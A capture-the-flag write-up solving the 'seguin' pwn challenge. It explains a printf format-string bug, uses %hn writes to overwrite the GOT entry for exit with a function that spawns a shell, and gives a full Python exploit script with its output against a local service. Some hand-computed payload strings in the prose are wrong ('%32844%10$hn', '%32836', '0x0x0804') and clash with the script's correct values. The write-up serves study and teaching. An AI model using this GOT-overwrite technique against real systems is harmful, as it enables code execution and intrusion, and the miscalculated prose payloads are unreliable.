Writeup by edoardo3512 for Seguin

Table of contents

Binary

The given binary seguin is a 32 bit, dynamically linked executable, with debug symbol still present.

$file seguin 
seguin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=f845ef5d12dec4dc33f8be776208c5af5b1b52c4, for GNU/Linux 3.2.0, not stripped

$checksec seguin 
[*] '/media/edo/linux data/FCSC_hackropole/pwn - seguin/solve/seguin'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No

We can see from the checksec that the binary is not PIE, Partial RELRO and without a canary. The fact that it is not PIE means that the address at which the binary is loaded in memory is not random, so we already know the position of every function at runtime without having to leak any data. Partial RELRO means that the addresses of the libc functions that the binary has to call will be saved in the Global Offset Table (GOT) immediately when the program starts, but most of all, the page is not protected and can be overwritten. Finally the absence of a canary means that there is no protection against a buffer overflow that would overwrite the return address.

Running the binary doesn’t give us any information, probably it’s gonna be a simple buffer overflow with return to a win function (spoiler, I was wrong), so let’s peek into the code with Ghidra.

$./seguin
************************************
** Service d'adoption des bovidés **
************************************
Merci d' indiquer le nom de l'animal que vous etes venus chercher :
>>> chevre
Vouz avez demandé chevre
Nous vous tiendrons au courant

Decompiling the program

First of all, hidden in the binary, but hinted by the challenge description, there is a win function. Our goal will be to control the flow of the program to call this function.

void chevre(void)

{
  system("/bin/sh");
  return;
}

The main function is quite simple. The program reads 32 bytes and then prints them back. We can notice that there is no buffer overflow, but also that our input is printed by passing the buffer directly to printf instead of using puts or printf("%s", buffer). This is a terrible idea because any formatting in our input will be executed by the function. We can use it to leak data with %p, but more importantly for our case, to write with %n.

void main(void)

{
  char buffer [32];
  undefined *puStack_10;
  
  puStack_10 = &stack0x00000004;
  puts("************************************");
  puts(s_**_Service_d'adoption_des_bovid_s_0804a038);
  puts("************************************");
  printf("Merci d\' indiquer le nom de l\'animal que vous etes venus chercher :\n>>> ");
  fflush(_stdout);
  fgets(buffer,0x20,_stdin);
  printf(s_Vouz_avez_demand_0804a0a9);
  printf(buffer);
  puts("Nous vous tiendrons au courant");
                    /* WARNING: Subroutine does not return */
  exit(0);
}

The function doesn’t return and calls exit(0) instead, so overwriting the return pointer is not an option, but what can we overwrite that will control the execution of the program ?

The GOT! We can overwrite the addresses of a libc function with the address of our wih function chevre, and the program will execute this one instead of the desired function. For example we can overwrite got.exit and the program will open a shell instead of shutting down.

Understanding printf

Let’s take a moment to remember how a printf can be used to write data in memory. This is done through the specifier %n which will save how many characters have been printed so far. For example printf("Done!\n%nWhat is next ?\n", &count) is equivalent as printf("%s", "Done!\n"); count = 5; printf("%s", "What is next?\n"). %n is the default argument to save an integer, but you can also use hn and hhn if you only want to write respectively a short or a byte, and we will see how this is super important.

If we can only write how many bytes have been printed and the buffer can only contain 32 bytes, it shouldn’t be possible to write any value we want, right ? Wrong, here comes the second specifier we will use: %c. This argument is used to print a character, but you can also specify a width if you want to place the character at a specific position. For example printf("%2c", 0x41) will print " A", which counts as 2 characters and printf("%1000c") will print 1000 characters from an input of only 6 bytes. This allow us to print an arbitrary number of characters and therefore get an [almost] arbitrary write through %n even if the input buffer has a limited size.

Finally the last thing you need to know is that for each specifier you can also indicate which argument to use. For example printf("%2$d %1$d", 1, 2) will result in 2, 1. But what happens when we write printf("%1000$p") without passing directly any argument ?

Although the program is not “passing” any additional argument to printf, the function has no idea about that. When the formatting will ask for the 1000th argument the function expects it to be on the stack and will therefore go look for it and use whatever is there. Since our buffer in the main is on the stack and the stack frame for printf is place on top of the one from main we can access all the data we put in the buffer as if they were direct arguments passed to printf.

Writing the payload

The idea of our payload will be to place on the stack a pointer to got.exit and then use %n to overwrite the function’s address with the address of chevre: 0x080491b2. Although in theory we can use %134517170c, having the server send 134MB of data is not amazing, so we will instead split it into pieces. Ideally the fastest option would be to write one byte at the time because if we write down the bytes in acceding order we would have to print no more than 256 characters in total. The only problem is that our input would have to be around 60 characters long. To fit in the 32 characters allowed we will instead have to write two bytes at a time.

Why would we need 60 characters to overwrite the address one byte at the time ?

To write a single byte the formatting would be roughly "%..c%..hhn", where the dots are digits we would have to calculate. But this is already 10 characters, we then need 4 more characters to write the pointer to the specific byte we want to overwrite and we have to repeat this 4 times for each byte in the pointer we are writing, so in total around 14*4 = 56

In conclusion what we have to do is to write 0x0804 at got.exit+2 and 0x91b2 at got.exit. We can do it with a string f"%0x804c%...$hn%{0x91b2-0x804}c%...$hn" padded to 24 characters (or less as long as it is still a multiple of 4 so that the following pointer stay aligned on the stack) and then the two pointers to got.exit.

The only thing we are missing now is to know at which argument we will our pointers.

Finding the offset

For this we want to locate where is our buffer on the stack of printf. The simplest way to do it manually is to send a bunch of %p (or any other specifier that can not crash if given an invalid argument, and from which output you can clearly identify ASCII text) and see where we start to read our input.

$./seguin
************************************
** Service d'adoption des bovidés **
************************************
Merci d' indiquer le nom de l'animal que vous etes venus chercher :
>>> %p %p %p %p %p %p
Vouz avez demandé 0x20 0xf7021620 0x80491f4 0x25207025 0x70252070 0x20702520
Nous vous tiendrons au courant

In this case we can count 3 values on the stack (0x20, 0xf7021620, and 0x80491f4) and then our buffer with 0x25207025 == "%p %". The buffer contains therefore argument 4 to 11. The only problem is that "%32844%10$hn%35246c%11$hn" is 25 characters longs, so we will have to place the pointers at the beginning of the buffer to be able to access them as 4 and 5, removing 2 bytes from the string. This would have been the smart move from the start since it also avoids to have to worry about alignment, but I just don’t like it and prefer padding my string, mainly because now we have to count that printf will have already written 8 bytes and subtract it from the first width. The resulting string becomes "%32836%5$hn%35246c%4$hn"

In the case you make a mistake computing the offset (which of course I never did…) and printf crashes, or even worse just doesn’t write were you expect, don’t panic and remember that you can always change the %{n}hn into a simple %{n}p that will print the pointer you are trying to write to. For example in my case that’s how I realized that I started counting the arguments from 0 instead of 1 and was trying to write to a non valid address. (Remember to disable ASLR if the addresses you care about are randomized so that you can immediately recognise if they are correct or not between multiple tests)

Exploit

#!/usr/bin/env python3
from gdb_plus import *

binary_name = "./seguin"
context.binary = binary_name

HOST = "127.0.0.1"
PORT = 4000


def log_exploit(self):
    log.info(f"got.exit before printf: {hex(self.read_int(self.symbols['got.exit']))}")
    self.ni()
    log.info(f"got.exit after  printf: {hex(self.read_int(self.symbols['got.exit']))}")
    return False


def main():
    dbg = Debugger(context.binary).remote(HOST, PORT)
    dbg.b(0x8049289, callback=log_exploit) # Put a breakpoint on printf(buffer) to make sure the exploit works
    dbg.c(wait=False)

    # We already know the addresses, but let's keep it parametric
    high_bytes = dbg.elf.symbols["chevre"] // 0x10000 # 0x0x0804
    low_bytes = dbg.elf.symbols["chevre"] % 0x10000 # 0x91b2
    payload = p32(dbg.elf.symbols["got.exit"]) + p32(dbg.elf.symbols["got.exit"] + 2)
    if high_bytes > low_bytes:
        payload += f"%{low_bytes-len(payload)}c%4$hn%{high_bytes-low_bytes}c%5$hn".encode()
    else:
        payload += f"%{high_bytes-len(payload)}c%5$hn%{low_bytes-high_bytes}c%4$hn".encode()
    print(payload)
    
    dbg.p.sendlineafter(b">>> ", payload)
    sleep(1) # Wait to receive all the data from printf
    dbg.p.clean() # and throw it all away before getting the flag
    dbg.p.sendline(b"cat flag.txt")
    flag = dbg.p.recvline().decode()
    log.success(f"FLAG: {flag}") # You won <3

if __name__ == "__main__":
    main()

Our exploit works both locally

$python3 solve.py NOPTRACE
[*] './seguin'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No
[+] Starting local process './seguin': pid 19312
[!] Debug is off, commands won't be executed
b' \xc0\x04\x08"\xc0\x04\x08%2044c%5$hn%35246c%4$hn'
[+] FLAG: test_flag{solved}
[*] Stopped process './seguin' (pid 19312)

And remotely

 python3 solve.py REMOTE
[*] './seguin'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No
[+] Opening connection to 127.0.0.1 on port 4000: Done
[!] Debug is off, commands won't be executed
b' \xc0\x04\x08"\xc0\x04\x08%2044c%5$hn%35246c%4$hn'
[+] FLAG: REDACTED
[*] Closed connection to 127.0.0.1 port 4000